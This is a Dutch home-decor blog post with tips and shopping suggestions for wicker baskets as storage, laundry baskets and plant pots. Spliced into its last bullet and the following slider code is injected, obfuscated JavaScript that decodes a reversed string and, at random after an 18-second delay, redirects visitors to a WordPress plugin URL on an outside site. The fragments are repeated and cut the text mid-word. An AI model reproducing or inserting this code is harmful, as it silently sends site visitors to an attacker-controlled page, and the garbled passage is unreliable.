Multi-inzetbare rieten manden voor binnen en buiten

Rieten manden kun je natuurlijk voor heel veel doelen gebruiken. Gebruik ze als opberger, schaal of als bloempot. Eigenlijk kun je er alle kanten mee op en het ziet er ook nog eens leuk uit. Hier wat inspiratie en tips voor zowel binnen als buiten.

Manden op maat

Vaak worden rieten manden gebruikt als opberger. Je kunt er op een decoratieve manier veel spullen in opbergen. Niet alleen in de woonkamer, maar ook in de badkamer en keuken komen ze goed van pas. In veel brocante, landelijke kasten zijn deze manden zelfs onderdeel van de kast. De manden zijn dan precies op maat, zodat ze opgaan in het meubel. Ben jij ook op zoek naar zo’n landelijke kast? Kijk dan eens in de webshop van Viving. Leuk4weinig heeft namelijk een ruime collectie brocante woonmeubels en deze zijn vanaf heden ook verkrijgbaar via Viving.

Leuk voor buiten!

Sommige manden kun je ook goed buiten gebruiken. Houd er wel rekening mee dat niet alle manden hiervoor geschikt zijn en ze vaak niet meer één seizoen echt mooi blijven. Je hebt ook speciale rieten manden voor buiten. Deze kun je natuurlijk altijd gebruiken. Vorig seizoen heb ik zelf een hele grote rieten mand bij het tuincentrum gescoord. Deze staat vol met verse rozemarijn! Leuke is dat dit ook in de winter redelijk groen blijft, dus het er eigenlijk het hele jaar leuk uit ziet.

Manden voor binnen

Wat mij altijd verbaasd is dat producten van riet, nog best prijzig zijn. Vooral als je op zoek bent naar wat grotere manden of klein meubilair, dan valt dit best tegen. Goede tip is om de grotere tuincentra in de gaten te houden. Zij hebben vaak hele verrassende artikelen voor een leuke prijs. Ook winkels als de action, Xenos en Leen Bakker hebben vaak erg leuke spullen!

Wat dacht je trouwens van de volgende ideeen voor binnen…?

  • In de keuken staat bij mij een knoflook- uien mand op het aanrecht te pronken. Hier ben ik zelf heel blij mee en gebruik ik dagelijks. Je hebt ze ook wat groter voor bijvoorbeeld aardappelen. Deze staat nog op mijn wishlist…
  • Wasmand; Op zolder heb ik een wasruimte met twee grote wasmanden voor witte en donkere wasjes. Maar om nu de hele tijd naar de zolder te lopen voor de wasmand is ook zo wat. In de badkamer staat daarom een kleine rieten mand voor de dagelijkse was. Past ook nog eens heel goed bij de sfeer van de badkamer met veel natuurlijke materialen en tinten.
  • Tijdschriften kan ik echt niet genoeg hebben. Vandaar in de woonkamer een hele grote rieten mand met leesvoer. Heerlijk om s’avonds lekker een blaadje te pakken voor wat kook- en interieur inspiratie. Wel af en dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe even opruimen en wat tijdschriften doorgeven…
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” mode=”horizontal” speed=”5000″ slides_per_view=”4″ audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”yes” hide_pagination_control=”” hide_prev_next_butdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons=”” partial_view=”” wrap=”yes” img_size=”300×300″]

Geen Reacties op "Multi-inzetbare rieten manden voor binnen en buiten"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.